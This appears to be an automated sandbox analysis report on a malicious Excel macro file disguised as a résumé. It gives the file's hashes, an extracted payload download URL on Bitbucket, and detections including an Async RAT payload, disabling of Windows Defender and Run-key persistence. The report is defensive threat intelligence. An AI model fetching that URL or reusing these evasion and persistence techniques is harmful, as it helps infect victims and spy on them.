General
-
Target
Curriculo Laura Sperandio (ps).xlsm
-
Size
23KB
-
Sample
201224-zwgdeqncge
-
MD5
dbad290342a0f6cd2554a4d7b06ff400
-
SHA1
ea9e6a18734a7a389eaa66eace35c84ede9152c3
-
SHA256
cf0f7d178b74a724d306e95469e7e3a8a8974c69a659a365ab8f1c129a69ec10
-
SHA512
a26c41a262c375fce4369b51ee19283504e7aeed975416551f193b00313a083a26a034e69bcff59b6719b006e0dfb0ec4fb295ba6426a12a5d901c5c1810dc63
Static task
static1
Behavioral task
behavioral1
Sample
Curriculo Laura Sperandio (ps).xlsm
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Curriculo Laura Sperandio (ps).xlsm
Resource
win10v20201028
Malware Config
Extracted
https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe
Targets
-
-
Target
Curriculo Laura Sperandio (ps).xlsm
-
Size
23KB
-
MD5
dbad290342a0f6cd2554a4d7b06ff400
-
SHA1
ea9e6a18734a7a389eaa66eace35c84ede9152c3
-
SHA256
cf0f7d178b74a724d306e95469e7e3a8a8974c69a659a365ab8f1c129a69ec10
-
SHA512
a26c41a262c375fce4369b51ee19283504e7aeed975416551f193b00313a083a26a034e69bcff59b6719b006e0dfb0ec4fb295ba6426a12a5d901c5c1810dc63
Score10/10-
Contains code to disable Windows Defender
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Async RAT payload
-
Blocklisted process makes network request
-
Executes dropped EXE
-
Uses the VBS compiler for execution
-
Adds Run key to start application
-
Legitimate hosting services abused for malware hosting/C2
-
Suspicious use of SetThreadContext
-